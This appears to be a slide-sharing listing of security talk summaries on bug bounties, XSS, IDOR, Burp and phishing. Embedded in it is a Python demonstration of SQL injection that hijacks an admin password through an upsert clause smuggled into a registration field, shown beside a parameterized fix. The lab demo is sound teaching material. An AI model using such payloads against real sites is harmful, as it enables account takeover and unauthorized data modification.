Writing Vuln Submissions that Maximize Your Payouts - presentation given at Nullcon 2016 by Bugcrowd's Kymberlee Price.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
The document discusses bug bounty hunting. It introduces Shubham Gupta and Yash Pandya who are security consultants and top bug hunters. It outlines the agenda which includes an introduction to bug bounty programs, reasons for bug hunting, how to find bugs, quick tips, proofs of concept, pros and cons, and a Q&A. It provides a brief history of bug bounty programs and notes that now anyone can participate from home. It discusses types of bugs and tools used for hunting. Quick tips include using Google dorks, testing for information disclosure vulnerabilities, and completing challenges to improve skills. Examples are provided of unique bugs found like SVG XSS and an IDOR issue found in Google.
Killing a bug bounty program - twice, Hack In The Box 2012, by Nir Goldshlager
The document summarizes the authors' experience hacking various Google services and bug bounty programs in order to find vulnerabilities. They were able to find and exploit stored cross-site scripting (XSS) vulnerabilities in Google Calendar, Analytics, FeedBurner, and Affiliate Network. They also used subdomain takeovers and permission bypasses to access restricted files on Picnik. The authors stressed thinking creatively and using "out-of-the-box" approaches to find vulnerabilities where others did not.
This document discusses bug bounty programs, which pay security researchers monetary rewards for reporting qualifying security bugs to companies. It explains that bug bounties are a cost-effective way for companies to improve security. The document provides tips for getting started in bug hunting, such as practicing skills, reading materials, and thinking logically. Popular bug bounty programs and platforms are also listed.
This document provides information for a bug bounty presentation. It introduces the speaker, Sagar Parmar, and his background in security. It then outlines topics to cover, including what a bug bounty is, how to get started as a new bug bounty hunter, tips for progressing, and example vulnerabilities to target like XSS, SQLi, SSRF, LFI, and RCE. Details are given on finding and reporting vulnerabilities with the goal of helping others learn and advance in bug bounty hunting.
This document provides an introduction to bug bounty programs. It defines what a bug bounty program is, provides a brief history of major programs, and discusses reasons they are beneficial for both security researchers and companies. Key points covered include popular programs like Google and Facebook, tools used in bug hunting like Burp Suite, and lessons for researchers such as writing quality reports and following each program's rules.
Bug bounty programs involve paying security researchers rewards for finding vulnerabilities in companies' products. To participate, researchers need to understand the target company's products and domains, know which companies offer bounties, and find bugs that are in scope like XSS, SQL injection, or authentication bypasses. Rewards can range from $100 to $20,000. Major companies like Google, Facebook, and Mozilla run bounty programs and have collectively paid over $1 million to researchers. Examples are shown of real bugs found and reported through bounty programs. The conclusion encourages reporting bugs to companies rather than selling vulnerabilities.
This document discusses security bug bounty programs, which offer monetary rewards to researchers who discover qualifying security flaws in companies' systems. It outlines reasons for companies to implement such programs, like finding critical bugs faster and building relationships with the security community. Guidelines are provided on starting a bounty program, like starting small and gradually increasing budgets over time. Lessons from other large companies' bounty programs are shared, such as maintaining changing leaderboards to keep the field interesting.
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and Abroad, by Mazin Ahmed
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and Abroad
http://blog.mazinahmed.net/2016/10/bug-bounty-hunting-swiss-cyber-storm.html
This document provides an overview of bug bounty hunting. It discusses:
- What bug bounty programs are and how they work
- A brief history of major bug bounty programs from the 1990s to present day
- Reasons to participate in bug bounty hunting like money, career opportunities, and enjoyment
- Popular bug bounty platforms and programs
- How to get started with the process of bug hunting
- Tips for writing bug reports that document the issue and steps to reproduce it
- Examples of past bug bounty finds, like an SVG XSS filter bypass and a tapjacking proof of concept
This document provides an introduction and overview of cross-site scripting (XSS) attacks. It discusses the impact of XSS, the different types (non-persistent, persistent, DOM-based), how XSS works by injecting client-side code through web requests, and includes demos. The document concludes with recommendations for preventing XSS, including validating and encoding input and output to avoid injecting malicious scripts.
Bounty Craft: Bug bounty reports, how do they work? @sushihack presents at Nullcon, by HackerOne
1. The document discusses how to write effective bug bounty reports by understanding what security teams look for in reports. It emphasizes providing detailed reproduction steps, analyzing exploitability and potential impact, and considering the perspective of the security team.
2. Common elements of an effective report include clear reproduction steps, analysis of how an attack could actually work in the real world, and understanding what types of vulnerabilities are important to the specific organization based on their industry and needs.
3. The presentation provides examples of good and bad reports, outlines typical service level agreements, and emphasizes asking questions to understand the priorities and scope of individual security programs.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016, by Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He has received the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present, using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call at 02:30 on a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
The first security technology bug bounty predated the Internet by over one hundred years: Alfred C Hobbs breaking an unbreakable lock at the Great Exhibition of 1851 for the princely sum of 200 Guineas. With the acceleration of technology adoption, unintended consequences, our adversaries, and the need to quickly understand how "unhackable" things really are, it's safe to say that things have escalated since then.
In 2021, there are as many who benefit from engaging the good-faith hacker community as there are folks who find themselves lost in a mish-mash of term confusion, unclear expectations, and general reservations - in spite of the increasingly obvious truth that "it takes an army of allies to overcome an army of adversaries". This breakout is for both.
Casey John Ellis, the Founder, Chairman, and CTO of Bugcrowd, pioneer of the crowdsourced security as-a-service category, and co-founder of The Disclose.io Project will unpack the "family tree" of vulnerability disclosure, bug bounty, and crowdsourced security testing, frame up how we got here, and facilitate a discussion from the group about where it all goes next.
Corncon 2021 - Inside the Unlikely Romance, by Casey Ellis
It has been 20 years since Rainforest Puppy released the RFPolicy responsible disclosure policy, 11 years since Google and Facebook brought the concept of bug bounty into the eye of the security industry, and 9 years since Bugcrowd pioneered the concept of inserting a platform in the process to facilitate conversations between builders and breakers in order to level the skill and resourcing playing field against our adversaries.
So, how’s it all going? Did it all turn out to be a “tech company” thing? What have the results, and the impact on cybersecurity defense been on more traditionally conservative industries, like financial services? What can the history of the relationship between helpful hackers and organizations tell us about what we’ll need for the future?
In this talk, Casey Ellis (Founder, Chairman, and CTO of Bugcrowd) will unpack some salient lessons after nearly 10 years building Bugcrowd.
TechCrunch Early Stage 2020 - How to prioritize security at your startup, by Casey Ellis
Security is one of the most important things for a startup to focus on, but many struggle to dedicate time, resources, or budget to protect against something you never want to happen. How should startups prioritize security, and what do emerging companies need to know?
The document provides an introduction to bug bounty programs for beginners. It outlines some prerequisites like patience and basic security knowledge. It highlights rewards available in bug bounty programs like money and gifts. The document recommends initial approaches like understanding the testing scope and performing reconnaissance on domains and subdomains. It also provides tips on tools for testing like web proxies and Firefox addons. Automated testing on a local web server is discussed along with techniques for bug submission and reporting. A demo of a stored XSS bug in Facebook is presented at the end.
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME, by Casey Ellis
Just over 8 years ago bug bounty was a shiny security thing that crazy tech companies did sometimes, the concept of a digital locksmith hadn't been established in the consumer yet, and the Internet was generally a smaller and less politicized place. Casey Ellis decided it might be a good idea to "release the hounds" into the status quo, launching Bugcrowd and kicking off the crowdsourced security as a service market category, and it's safe to say that a fair bit has happened since. This keynote is for infosec practitioners and budding cybersecurity entrepreneurs, talking through what we've learned, what's changed, where I think it's all going next, and where we can position ourselves to continue making the Internet a more resilient place.
#AusCERT2021 - Inside The Unlikely Romance: Crowdsourced Security from a Financial Services Perspective, by Casey Ellis
It has been 20 years since Rainforest Puppy released the RFPolicy responsible disclosure policy, 11 years since Google and Facebook brought the concept of bug bounty into the eye of the security industry, and 9 years since Bugcrowd pioneered the concept of inserting a platform in the process to facilitate conversations between builders and breakers in order to level the skill and resourcing playing field against our adversaries.
So, how’s it all going? Did it all turn out to be a “tech company” thing? What have the results, and the impact on cybersecurity defense been on more traditionally conservative industries, like financial services? What can the history of the relationship between helpful hackers and organizations tell us about what we’ll need for the future?
In this talk, Casey Ellis (Founder, Chairman, and CTO of Bugcrowd) will unpack some salient lessons after nearly 10 years building Bugcrowd.
OWASP Bangalore meet - Android Mobile Security, by Abhinav Sejpal
OWASP Bangalore meet - 28th March 2015, 10:00 AM - 2:00 PM
Mobile Application Security Testing Overview
The Building blocks of Android Apps
Live demos w.r.t. Android App:
Demo 1 - Poor Authorization and Authentication (M5)
Demo 2 - Sensitive Information Leakage (M4)
Demo 3 - Insecure Data Storage (M2)
Test factory Arsenal
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame, by Abhinav Mishra
The document provides an overview of the game of bug bounty hunting, including a brief history of bug bounty programs, the present state of platforms like HackerOne and BugCrowd, tips for getting started, techniques for finding different types of vulnerabilities, examples of famous bounty submissions, and potential drama one may face. It also includes suggestions for resources, tools, blogs, and people to follow to continue learning and developing skills in bug bounty hunting.
Sucuri Webinar: How to identify and clean a hacked Joomla! website, by Sucuri
Website compromises can happen to any CMS, and fixing them can be a daunting task.
In this webinar, Sucuri Remediation Team Lead Ben Martin provides a step-by-step guide to fixing your hacked Joomla! site.
If your website becomes compromised, this webinar helps you minimize the time the attacker has on the site and the stress of the cleanup.
Video here: https://youtu.be/3BEUQ0X9IBo
Co Speaker: Cheryl Biswas
Talk Description:
How about this: a blue team talk given by red teamers. But here’s our rationale - your best defence right now is a strategic offence. The rules of the game have changed and we need to get defence up to speed.
We’ll show you what the key elements are in a good defence strategy; what you can and need to be using to full advantage. We’ll talk about the new “buzzwords” and how they apply: visibility; patterns; big data. There’s a whole lotta data to wrangle, and you aren’t seeing the whole picture if you aren’t doing things right. Threat intel is about getting the big picture as it applies to you. You’ll learn the importance of context and prioritization so that you can manipulate intel feeds to do your bidding. And then we’ll take things further and talk about hunting the adversary, using an update on proven methodologies.
We’ll show you how to understand your data, correlate threats and pinpoint attacks. Attendees will leave with a new understanding of the resources they have on hand, and how to leverage those into an Adaptive Proactive Defense Strategy.
This document discusses approaches to testing open APIs using parameterized tests. It describes using data providers in TestNG and JUnit to pass parameters to tests from a data source. Examples are given in Java using TestNG data providers and JUnit's @Parameterized annotation. Similar approaches for Python and Scala are also listed. The document shows sample code using RestAssured to make requests to an API with different parameters. It discusses evolving the tests to run concurrently using multiple threads for improved performance.
Learn about the top hacking techniques of 2014, tips to stay away from hackers, and how Quick Heal can protect you against cybercriminals and other threats on the Internet.
This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
Polyglot payloads in practice, by avlidienbrunn at HackPra, by Mathias Karlsson
A lecture/talk describing how to build and use polyglot payloads for finding vulnerabilities in web applications that traditional payloads can't.
Here's the last slide: http://www.slideshare.net/MathiasKarlsson2/final-slide-36636479
How to do well in Bug bounty programs. Presentation at @nullhyd by Abhijeth, by Abhijeth D
This presentation talks about how to do well in bug bounty programs. The slides explain a few best practices suggested by the top bug hunters around the world.
For further details about the presentation/suggestions feel free to contact @abhijeth.
How to steal and modify data using Business Logic flaws - Insecure Direct Object References, by Frans Rosén
This document discusses insecure direct object references (IDOR), which occur when a developer exposes references like file or database keys without access control. This allows attackers to access unauthorized data by manipulating the references. The document provides examples of IDOR vulnerabilities found in Twitter, Oculus, Square, Zapier, and WordPress. It emphasizes having a generic access control model, using user IDs instead of numeric IDs, and thoroughly reviewing code to prevent IDOR issues.
This document discusses cross-origin attacks using polyglot files that can be interpreted in multiple formats. Specifically, it examines:
1) Syntax injection attacks where fragments of PDF syntax are injected into HTML pages hosted on vulnerable sites, allowing extraction of sensitive data from the original domain.
2) Content smuggling attacks where an attacker uploads a polyglot file in a benign format (e.g. PDF) that also contains malicious content to a vulnerable site, then embeds it to exploit visitors through content reinterpretation.
3) The potential for these attacks using PDF, which has powerful interactive capabilities, error-tolerant parsing, and the ability to issue cross-origin requests, including CSRF with cookies.
Lightning talk I gave at SEC-T spring pub 2016, talking about how to use the "ON DUPLICATE KEY UPDATE" syntax to not only extract but also modify/add information in the database.
The example I brought up was a site that had an SQL Injection in the register page, which could be used to change the admin password without having to crack it.
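An added example of the technique the talk describes, written in Python against an in-memory SQLite database rather than the MySQL schema from the talk, and not the speaker's own code. SQLite spells MySQL's `ON DUPLICATE KEY UPDATE` as `ON CONFLICT(...) DO UPDATE SET`, but the injection works the same way: the attacker "registers" the existing admin username and the injected clause turns the INSERT into an UPDATE of the admin's password. The users table, the admin account and the payload are constructed here; passwords are stored as plain strings only to keep the example short, since with hashing the attacker just supplies a hash they already know.

```python
import sqlite3


def make_db():
    """Constructed sample schema with one pre-existing admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, role TEXT)"
    )
    conn.execute("INSERT INTO users VALUES ('admin', 'original-admin-secret', 'admin')")
    conn.commit()
    return conn


def register_vulnerable(conn, username, password):
    """Registration built by string formatting: the INSERT is injectable."""
    sql = (
        "INSERT INTO users (username, password, role) "
        "VALUES ('%s', '%s', 'user')" % (username, password)
    )
    conn.execute(sql)
    conn.commit()


def register_safe(conn, username, password):
    """Same INSERT with bound parameters. Registering an existing username now
    fails on the primary key instead of becoming an UPDATE."""
    try:
        conn.execute(
            "INSERT INTO users (username, password, role) VALUES (?, ?, 'user')",
            (username, password),
        )
    except sqlite3.IntegrityError:
        return False
    conn.commit()
    return True


def password_of(conn, username):
    row = conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None


# The attacker registers the admin username. The password field closes the
# VALUES list, appends the upsert clause and comments out the rest of the
# original statement, so the server executes this single statement:
#   INSERT INTO users (username, password, role)
#   VALUES ('admin', 'pwned', 'user')
#   ON CONFLICT(username) DO UPDATE SET password = 'pwned' --', 'user')
# (In MySQL the clause would read: ON DUPLICATE KEY UPDATE password = 'pwned')
ATTACKER_USERNAME = "admin"
ATTACKER_PASSWORD = (
    "pwned', 'user') ON CONFLICT(username) DO UPDATE SET password = 'pwned' --"
)


def demo():
    """Returns the admin password after the vulnerable registration and after
    the parameterized one, using the same attacker input for both."""
    vuln = make_db()
    register_vulnerable(vuln, ATTACKER_USERNAME, ATTACKER_PASSWORD)

    safe = make_db()
    register_safe(safe, ATTACKER_USERNAME, ATTACKER_PASSWORD)
    return password_of(vuln, "admin"), password_of(safe, "admin")


if __name__ == "__main__":
    print(demo())
```

Nothing is read back to the attacker in this flow: the write itself is the payoff, which is why a blind or error-suppressed injection on a registration form is still worth reporting as critical.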
If You Can't Beat 'Em, Join 'Em (AppSecUSA), by bugcrowd
Grant McCracken and Daniel Trauner's presentation on setting up and managing a successful bug bounty program. Having a bug bounty program is one of the most efficient methods of finding security vulnerabilities today. But, as anyone who has tried to run a bug bounty program knows, it's not a trivial undertaking... As professionals who have helped to manage hundreds of bug bounty programs, we're uniquely positioned to provide advice on how to succeed. Whether you're already running a bug bounty program, are looking to run a bug bounty program, or are a researcher, this talk aims to deepen your knowledge of the subject.
Presented at OWASP AppSecUSA 2011
It's all about scale; how can an organization possibly keep up with a growing number of web applications, features, and supported capabilities with a limited security team? One option that has provided successful results for several companies is a bug bounty program. These programs successfully engage the world community and bring many eyes towards the common good.
This talk will discuss the benefits and risks of a bounty program for web applications. What types of organizations consider starting a bounty? How would an organization start such a program and what should they expect? Is the return worth the effort? How does such a program compete with the black market?
In addition to these topics, we will also discuss the progress, metrics and lessons learned from the Mozilla web application bounty that was launched in December 2010.
BSides Lisbon 2013 - All your sites belong to Burp, by Tiago Mendo
This talk is going to be all about Burp. I will explain why it is such a great tool and how it compares with similar ones.
It's going to have a quick walkthrough of its main features, but the juicy part is going to be about how to fully explore its main tools, such as the scanner, intruder and sequencer, to increase the number and type of vulnerabilities found.
In addition, I will provide an overview of the Burp Extender interface and how to easily and quickly take advantage of extensions to increase its awesomeness. I will show how easy it is for a pentester to translate an idea into an extension and (I hope) publicly release one plugin to further help pentesters.
The talk's objective is to increase your efficiency while using Burp, either by taking advantage of its excellent tools or by adding that feature you really need.
Presented at BSides Lisbon on 04/10/13 (http://bsideslisbon.org)
Getting the Most out of Burp Extensions. How to build a Burp extension, techniques for passive and active scanners, defining insertion points, modifying requests, and building GUI tools. This talk presents code libraries to make it easy for testers to rapidly customize Burp Suite.
Web-App Remote Code Execution Via Scripting Engines by Rahul Sasi at c0c0n - International Cyber Security and Policing Conference http://is-ra.org/c0c0n/speakers.html
This document provides an agenda for a presentation on web application pentesting and using Burp Suite. The presentation will include an overview of Burp Suite, how to get started with it, automated and manual testing techniques, and tips for web hacking. It will cover features of Burp like the proxy, spider, scanner, intruder, repeater, sequencer, and extender. The goal is to help attendees learn the foundation of using Burp Suite for web assessments.
Advanced SQL injection to operating system full control (whitepaper), by Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said about this specific vulnerability, but not all of its aspects and implications have been uncovered yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those overlooked and theoretically non-exploitable scenarios: from command execution on MySQL and PostgreSQL to stored procedure buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with the new version of my own tool, which I will release at the conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
This document discusses methods for bypassing file upload restrictions on websites, including modifying HTTP headers, embedding malicious code in image files, and using NULL bytes in filenames. It demonstrates how these techniques can allow uploading PHP shells or other code to gain remote command execution or full server control. The document recommends upload logs and secure coding as better security practices than trying to implement perfect input filtering, which is complicated and can still be bypassed.
Burp Suite is a Java-based tool for testing web application security, available in free and commercial editions. It includes several integrated tools: Proxy, Spider, Scanner, Intruder, Repeater, and Sequencer. The Proxy is used to intercept, modify, and replay HTTP/S requests. The Spider crawls the web application to discover hidden resources. The Scanner automatically scans for vulnerabilities. Intruder allows for customized attacks through fuzzing. Repeater replays requests for manual testing. Sequencer analyzes the randomness of tokens. It supports Windows, Mac, and Linux.
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services, by Abraham Aranguren
XXE Exposed Webinar Slides:
Brief coverage of SQLi and XSS against Web Services, then XXE and XEE attacks and mitigation. Heavily inspired by the "Practical Web Defense" (PWD) style of pwnage + fixing (https://www.elearnsecurity.com/PWD)
Full recording here:
NOTE: (~20 minute) XXE + XEE Demo Recording starts at minute 25
https://www.elearnsecurity.com/collateral/webinar/xxe-exposed/
The document describes how to steal Gmail credentials using social engineering and the Social Engineering Toolkit (SET). It involves tricking a victim into entering their login credentials on a spoofed Gmail login page hosted on the attacker's machine. The attacker first sets up Kali Linux in a virtual machine and launches SET. They then change the victim's Gmail bookmark to point to the attacker's IP address hosting the fake login page. When the victim tries to access Gmail, they enter their credentials, which are captured by SET. The document warns readers to be vigilant against this kind of social engineering attack.
This document discusses hackers and software security. It provides examples of past hacks such as those on Sony Pictures and Citigroup. It outlines why software security is important when handling sensitive user information. The document discusses how hackers think and different types of hackers. It recommends following security principles like defense in depth, least privilege, and keeping security simple. It provides references for further reading on application security topics.
Devnexus 2017 Cybercrime and the Developer: How do you make a difference? (Steve Poole)
Cybercrime: how bad can it be? Organised attacks around the world in 2016 have shown how unprepared we are to deal with the growth of cybercrime. In this talk learn a little about the scale of the challenge developers face from assaults on our systems. Be prepared to be appalled and scared. Fainting is not allowed. Discover how to fight back and see how you can change your behaviour and your code to defend against these attacks.
Your destiny is clear: it's time to become a Cyber Defender.
While phishing is an “old-fashioned” cyber security threat, attacks continue to increase. This course will better prepare you to defend against this threat.
Phishing attack, with SSL Encryption and HTTPS Working, by Sachin Saini
This presentation contains an introduction to phishing attacks, their types and the various techniques used, and their impact illustrated with a real-life example, followed by avoidance, prevention and solutions. It also contains a brief introduction to SSL and HTTPS and how they work.
Jax london2016 cybercrime-and-the-developer, by Steve Poole
In the emerging world of DevOps and the Cloud, most developers are trying to learn new technologies and methodologies. The focus tends to be on adding capabilities such as resiliency and scaling to an application. Still, one critical item consistently overlooked is security.
The world of the cyber criminal is closer than you realize. Watch a real man-in-the-middle demonstration and learn just how simple it can be for others to steal your secrets. In this talk you'll learn about other practical examples of how you can inadvertently leave the doors open and what you can do to keep your system secure. In the end, security is everyone's concern, and this talk will teach you a few simple actions you can take (and some behaviours you must change) to create a more secure application in the Cloud.
Phishing Attacks - Are You Ready to Respond? (Splunk)
Phishing and Spear Phishing attacks are the number one starting point for most large data breaches. But there is currently no efficient prevention technology available to mitigate this risk. Learn what capabilities organizations need to have in order to respond to phishing attacks and lower the risk.
- Learn how to detect and respond to phishing attacks
- Understand how an average user behaves when faced with a phishing attack and why they are so successful
- Get insight into the questions that you will need to answer if a phishing campaign is running against your organisation
- Learn the capabilities organisations will need to have in order to answer those questions and protect against phishing attacks
- Learn how to improve your incident response capabilities
If you received an email from Instagram letting you know that your email address was changed, you may be able to undo this by using the revert this change option in that message. If additional information was also changed (example: your password), and you're unable to change your email address, please report the account to Instagram.
Under section 43, a simple civil offence in which a person accesses a computer without the owner's permission and extracts or damages the data contained therein attracts civil liability. The hacker is liable to pay compensation to the affected party. Under the Information Technology Act, 2000, the maximum compensation was capped at Rs. 1 crore; the 2008 amendment removed this ceiling.
Dealing with the threat of spoof and phishing mail attacks part 6#9 | Eyal ... (Eyal Doron)
In the following article, we will review the solutions and the methods that we can use for dealing with the threat of phishing mail attacks and their derivative, the spoof mail attack.
2022 Rea & Associates' Cybersecurity Conference, by Rea & Associates
The speaker discusses changes to the Cybersecurity Maturity Model Certification (CMMC) program over the past year, including changes to the CMMC model, rules, and the organization administering the program. Voluntary assessments are now taking place and the CMMC ecosystem of assessors, trainers, and consultants is developing. Remaining challenges include high costs of compliance, legal consequences, reciprocity between government agencies, and issues with cloud computing. The speaker stresses the importance of ethics and offers that help is available for organizations navigating CMMC requirements.
The document provides instructions for writing an essay using the website HelpWriting.net. It outlines a 5-step process: 1) Create an account with a password and email; 2) Complete a 10-minute order form with instructions, sources, and deadline; 3) Review bids from writers and choose one; 4) Review the completed paper and authorize payment; 5) Request revisions to ensure satisfaction. The website promises original, high-quality content and refunds for plagiarized work.
Social Media's Dark Side: Risks, Reasons & Remedies, by Richard M
This document summarizes the risks of social media and provides remedies. It discusses how social media has increased risks from competitors, employees, and careless practices. Specific risks mentioned include brand association, executive indiscretion, employee messaging, activists, phishing and hacking, and impersonation. Remedies proposed include social media monitoring strategies, rules of engagement for responding to issues, and action strategies like responding to threats, removing threats, and burying threats through positive coverage. It emphasizes the importance of having a social media crisis team and continually monitoring to protect brands across sites.
This document summarizes a student project analyzing phishing attacks on the Facebook social media platform. The study involved:
1) Creating a fake Facebook login page to simulate a phishing scam and collect data on users who entered their credentials.
2) Approximately 1 in 3 Facebook users fell for the simulated scam, suggesting that social media users are particularly vulnerable to phishing.
3) Tests showed Facebook does not effectively deal with phishing attacks. Additional authentication for accessing accounts from new devices was proposed to help address this issue.
The document discusses a biology student's volunteer experience participating in a breast cancer walk for a class assignment, requiring preparation for the event including fundraising and spreading awareness about breast cancer. During the event, the student helped set up, assisted participants, and learned more about how nonprofit organizations support breast cancer research and patients. Overall, the experience provided valuable learning outside of the classroom.
The document discusses security issues related to Ajax and JavaScript. It summarizes how a hacker named Samy was able to infect over 1 million MySpace profiles in 2005 by hiding malicious JavaScript in a URL. It then outlines the security risks if an attacker is able to inject scripts into a user's web page, including being able to make requests to any server, access the user's browser history and cookies, and potentially access the website's database. The document argues that the web's security model is flawed and that an object capability model is needed to properly separate privileges and reduce security risks.
The document discusses security issues related to JavaScript and the web, highlighting problems like cross-site scripting attacks and how current approaches confuse the interests of users and programs; it proposes using an object capability model and strict containment of references to address these issues by distinguishing access and preventing unintended communication between objects. Several approaches are presented that aim to provide security by limiting the capabilities granted to code, including ADsafe which defines a safe JavaScript subset, and Caja which uses runtime rewriting to enforce capabilities.
The document discusses security issues related to JavaScript and the web, highlighting problems like cross-site scripting attacks and the lack of capability controls that allow scripts to access resources without restrictions. It proposes using an object capability model and techniques like ADsafe to constrain what scripts can do by only allowing the acquisition of references through trusted means. The goal is to redesign the DOM and JavaScript to build security in from the start through confinement and least privilege instead of trying to add it later.
This is a PPT on social media threats and their prevention. It is helpful for learning. Thanks.
Social media offers an outlet for people to connect, share life experiences, pictures and video. But too much sharing—or a lack of attention to impostors—can lead to a compromise of business and personal accounts.
Attackers often use social media accounts during the reconnaissance phase of a social engineering or phishing attack. Social media can give attackers a platform to impersonate trusted people and brands, or the information they need to carry out additional attacks, including social engineering and phishing.
Similar to Writing vuln reports that maximize payouts - Nullcon 2016
Ekoparty 2017 - The Bug Hunter's Methodology, by bugcrowd
The document outlines a methodology for effectively finding security vulnerabilities in web applications through bug hunting. It covers discovery techniques like using search engines and subdomain enumeration tools. It then discusses mapping the application by directory brute forcing and vulnerability discovery. Specific vulnerability classes covered include XSS, SQLi, file uploads, LFI/RFI, and CSRF. The document provides resources for each vulnerability type and recommends tools that can help automate the testing process.
3 Reasons to Swap Your Next Pen Test With a Bug Bounty Program, by bugcrowd
This webcast will analyze the key differences between the penetration testing and bug bounty models and explore why one company replaced their pen tests over the last three years.
View this on-demand webinar here: https://pages.bugcrowd.com/7-bug-bounty-myths-busted-ondemand-webinar
About the content:
Despite thousands of large and small organizations running bug bounty programs, there is still a lot of fear and uncertainty about these in the cybersecurity community. In this recorded webinar we will explore 7 myths about Bug Bounty programs, the hackers who are involved, and the impact they are having on the security posture of organizations around the world.
After viewing this presentation and on-demand webinar you will:
1. Learn if a bug bounty program is right for your organization
2. Understand if a bug bounty encourages hackers to attack your systems
3. Explore the real benefits of bug bounty programs – and find out if they actually work
4. Get insight on whether these programs are too hard and costly to manage
AppSecUSA 2016: 'Your License for Bug Hunting Season', by bugcrowd
You don’t need a license for bug hunting season anymore. Bug bounty programs are becoming well established as a valuable tool in identifying vulnerabilities early. The Department of Defense has authorized its first bug bounty program, and many vendors are taking a fresh look. While the programs are highly effective, many questions remain about how to structure bug bounty programs to address the concerns that vendors and researchers have about controlling bug hunters, security and privacy, contractual issues with bug hunters, what happens if there is a rogue hacker in the crowd, and liability and compliance concerns. This presentation will cover the best practices for structuring effective bug bounty programs.
Talk originally given at AppSecUSA 2016 | October 13, 2016
Bug Bounty Tipping Point: Strength in Numbers, by bugcrowd
Recorded on September 21, 2016, Casey Ellis, Bugcrowd CEO and Kymberlee Price, Sr. Director of Researcher Operations, explore current trends in the bug bounty market.
[Webinar] Building a Product Security Incident Response Team: Learnings from ..., by bugcrowd
Kymberlee Price's Black Hat 2016 talk in a live webcast. This presentation will address some best practices and templates to help security teams build or scale their incident response practices.
1) The document discusses tips for running a successful bug bounty program, including defining scope, focus, and exclusions up front; setting up an accessible testing environment; managing researcher expectations through clear communication; and establishing a vulnerability rating taxonomy.
2) It emphasizes the importance of preparation before launching a program, as well as ongoing communication and process improvement after launch.
3) Not preparing adequately by failing to provide scope or consider exclusions can result in a disaster, whereas a company that took bug bounty seriously saw a reduction in critical issues over time.
Revitalizing Product Security at Zephyr Health, by bugcrowd
Zephyr Health, a quickly growing company harnessing the power of global healthcare data, has spent the last year augmenting its product security efforts. With Bugcrowd's help, they have transformed their development and overarching culture to prioritize security. Bugcrowd joins Zephyr Health's CISO, Kim Green, to hear about how she came to understand and implement crowdsourced security testing within the organization.
HI THIS IS URGENT PLZ FIX ASAP: Critical Vulnerabilities and Bug Bounty Programs, by bugcrowd
Kymberlee Price's presentation from Black Hat 2015. In this presentation, Kymberlee discusses several highly critical vulnerabilities that have been uncovered through a variety of bug bounty programs and their impact on the customers. With participation from researchers and vendors, attendees will not only see some sweet vulnerabilities broken down, but also why wading through another submission from @CluelessSec might be worth it.
How Portal Can Change Your Security Forever - Kati Rodzon at BSidesLV, by bugcrowd
When used correctly, gamification can be one of the most effective tools for changing behavior on a large scale, but it requires more than just designing a few digital merit badges for doing security training. In this talk Kati Rodzon will discuss how games like Portal and Candy Crush were able to make millions and how those same techniques can be used to change security as we know it.
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip..., by bugcrowd
1. The document provides tips for effective hacking and bug hunting in 2015, focusing on web applications.
2. It discusses philosophy shifts towards crowdsourced testing, and techniques for discovery such as finding less tested application parts and acquisitions.
3. The document also covers mapping methodology, parameters to attack, and bypassing filters for XSS, SQLi, file inclusion, and CSRF vulnerabilities.
Crowdsourcing a penetration test through Bugcrowd's Flex model offers four main benefits: 1) You pay only for valid vulnerabilities found rather than researcher time spent; 2) Engaging many skilled researchers across different specialties increases the likelihood of finding issues; 3) The reward structure encourages in-depth testing by incentivizing top submissions; 4) This results in significantly more testing effort within similar timeframes as a traditional penetration test.
Mobile Application Security Threats through the Eyes of the Attacker, by bugcrowd
As an active security researcher with immense professional expertise in application security, Jason Haddix joins us to explain the common attack vectors that face today’s mobile applications -- from a hacker’s perspective.
Build or Buy: The Barracuda Bug Bounty Story [Webinar], by bugcrowd
The webinar discusses Barracuda's transition from an in-house bug bounty program to a third-party program managed by Bugcrowd. It describes how Barracuda initially built its own program in 2010, then weighed the pros and cons of switching to Bugcrowd for its scalability and to offload management of bounty payouts. The webinar outlines Barracuda's process for transitioning to Bugcrowd and how it adjusted its security team workflow and integration of bug submissions. Program stats from Bugcrowd show Barracuda paid out $27,771 on 316 submissions with an average priority of 3.5.
5 Tips to Successfully Running a Bug Bounty Program, by bugcrowd
Learn why bug bounties are great tools in application security, why they can be difficult, and how you can utilize them to start finding more critical vulnerabilities.
[Webinar] The Art & Value of Bug Bounty Programs, by bugcrowd
Her TED talk on the power of bug bounties has over a million views. On May 20, 2015, cybersecurity expert Keren Elazari joined Bugcrowd for an exclusive webinar. We did some bug bounty myth busting and trend spotting and had a great turnout. Keren's slides are here.
Key Takeaways from Instructure's Successful Bug Bounty Program, by bugcrowd
Slides used during Bugcrowd's 3/5/2015 webinar with Instructure, the innovative company behind Canvas Learning Management System. Learn why they turned to crowdsourced security, and how Bugcrowd's Flex program gave them great results.
How to run a kick ass bug bounty program - Node Summit 2013, by bugcrowd
